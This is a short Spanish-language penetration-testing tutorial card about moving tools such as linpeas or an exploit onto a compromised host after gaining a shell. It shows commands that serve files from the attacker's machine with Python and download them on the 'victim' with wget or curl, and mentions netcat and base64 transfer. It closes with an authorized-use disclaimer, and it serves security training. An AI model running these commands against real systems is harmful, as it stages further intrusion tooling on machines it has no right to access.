KALI
Transfiere archivos al objetivo
Ya tienes una shell; ahora necesitas subir tus herramientas, como linpeas o un exploit.
Los métodos: montas un servidor web rápido con python en tu máquina, y en el objetivo descargas con wget o curl. Si no hay salida directa, usas netcat en ambos lados.
Y para textos pequeños, copias en base64 y lo pegas. Saber mover archivos en cualquier situación es una habilidad básica de post-explotación.
Ten varios métodos listos, porque no siempre funciona el mismo.
# los comandos
kali@kali:~$ python3 -m http.server 80copiarServing HTTP on 0.0.0.0 port 80
www-data@victim:$ wget http://10.0.0.50/linpeas.sh -O /tmp/lp.sh || curl -O http://10.0.0.50/lp.shcopiarwww-data@victim:$ cat exploit.b64 | base64 -d > exploit # sin red de salidacopiarSolo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.